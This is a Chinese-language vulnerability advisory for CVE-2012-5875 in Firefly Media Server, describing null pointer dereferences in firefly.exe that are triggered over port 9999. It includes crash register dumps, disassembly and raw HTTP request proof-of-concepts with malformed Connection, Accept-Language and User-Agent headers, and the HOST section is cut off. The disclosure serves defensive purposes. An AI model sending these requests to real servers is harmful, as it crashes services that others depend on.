Firefly Media Server firefly.exe畸形HTTP请求远程拒绝服

日期：2020-06-07 栏目：程序人生浏览：次

发布日期：2012-12-20
更新日期：2012-12-21

受影响系统：
fireflymediaserver fireflymediaserver
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56999
CVE(CAN) ID: CVE-2012-5875

Firefly Media Server是开源的音频媒体服务器。

Firefly Media Server 1.0.0.1359及其他版本存在多个空指针引用漏洞，恶意用户可利用这些漏洞造成远程服务器崩溃。

1）"firefly.exe"文件内的HTTP CONNECTION标头没有正确处理，通过发送特制的报文到9999/TCP端口，可导致空指针引用，造成受影响服务器立即崩溃。

崩溃细节：
EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack)
EBX: 00000000 ( 0) -> N/A
ECX: 00000000 ( 0) -> N/A
EDX: 0175eef0 ( 24506096) -> n 0n-us,en;q=0.5U) (stack)
EDI: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack)
ESI: 0175eef5 ( 24506101) -> 0n-us,en;q=0.5U) (stack)
EBP: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap)
ESP: 0175eed0 ( 24506064) -> u0p xxxxxxx_xxxx_n 0n-us,en;q=0.5U) (stack)
+00: 00000000 ( 0) -> N/A
+04: 00000001 ( 1) -> N/A
+08: 0175ff80 ( 24510336) -> uw0</er<uuu\w@wu)|</er<uu|0|Aw<pv@vpx@ (stack)
+0c: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap)
+10: 00000000 ( 0) -> N/A
+14: 00000007 ( 7) -> N/A

反汇编：
0x0041e206 jnz 0x41e223
0x0041e208 mov edx,[ebp+0x4]
0x0041e20b push edi
0x0041e20c push edx
0x0041e20d push dword 0x4525e0
0x0041e212 push byte 0x2
0x0041e214 push byte 0x2
0x0041e216 call 0x40ea90
0x0041e21b add esp,0x14
0x0041e21e jmp 0x41e160
0x0041e223 cmp byte [ecx],0x20
0x0041e226 jnz 0x41e232
0x0041e228 inc ecx
0x0041e229 mov [esp+0x10],ecx
0x0041e22d cmp byte [ecx],0x20
0x0041e230 jz 0x41e228
0x0041e232 mov eax,ecx
0x0041e234 lea esi,[eax+0x1]
0x0041e237 mov dl,[eax]
0x0041e239 inc eax
0x0041e23a cmp dl,bl

PoC
GET / HTTP/1.1
Host: vulnhost.local
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: xxxxxxx_xxxx_
Referer:

2)"firefly.exe"文件内的ACCEPT-LANGUAGE, USER-AGENT和HOST HTTP标头参数没有正确处理，通过向9999/TCP端口发送特制的报文，可造成空指针引用，导致拒绝服务。

a) ACCEPT-LANGUAGE
崩溃细节：

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 ( 24506088) -> (stack)
EBX: 00000000 ( 0) -> N/A
ECX: 00000000 ( 0) -> N/A
EDX: 0175eef0 ( 24506096) -> nguage /5.0 (Windows; U) (stack)
EDI: 0175eee8 ( 24506088) -> (stack)
ESI: 0175eefa ( 24506106) -> /5.0 (Windows; U) (stack)
EBP: 00708830 ( 7374896) -> p3xxpppHFF (heap)
ESP: 0175eed0 ( 24506064) -> u0pguage /5.0 (Windows; U) (stack)
+00: 00000000 ( 0) -> N/A
+04: 00000001 ( 1) -> N/A
+08: 0175ff80 ( 24510336) -> uw0</er<uuu\w@wu)|</er<uu|0|Aw<pv@vp x (stack)
+0c: 00708830 ( 7374896) -> p3xxpppHFF (heap)
+10: 00000000 ( 0) -> N/A
+14: 00000007 ( 7) -> N/A

POC

GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us
en;q=0.5
\r\n
Keep-Alive: 300
Connection: keep-alive
Referer:

b) USER-AGENT

崩溃细节
EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack)
EBX: 00000000 ( 0) -> N/A
ECX: 00000000 ( 0) -> N/A
EDX: 0175eef0 ( 24506096) -> t t (stack)
EDI: 0175eee8 ( 24506088) -> xxxxxxx(stack)
ESI: 0175eef5 ( 24506101) -> t (stack)
EBP: 007087d8 ( 7374808) -> p>ppPp<p (heap)
ESP: 0175eed0 ( 24506064) -> upxxxxxxxt t (stack)
+00: 00000000 ( 0) -> N/A
+04: 00000001 ( 1) -> N/A
+08: 0175ff80 ( 24510336) -> N/A
+0c: 007087d8 ( 7374808) -> p>ppPp<p (heap)
+10: 00000000 ( 0) -> N/A
+14: 00000007 ( 7) -> N/A

PoC:

GET / HTTP/1.1
Host: somehost.com
User-Agent:
xxxxxxx
\r\n
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:

c) HOST

转载注明出处：https://www.heiqu.com/wygxzj.html

Firefly Media Server firefly.exe畸形HTTP请求远程拒绝服

相关推荐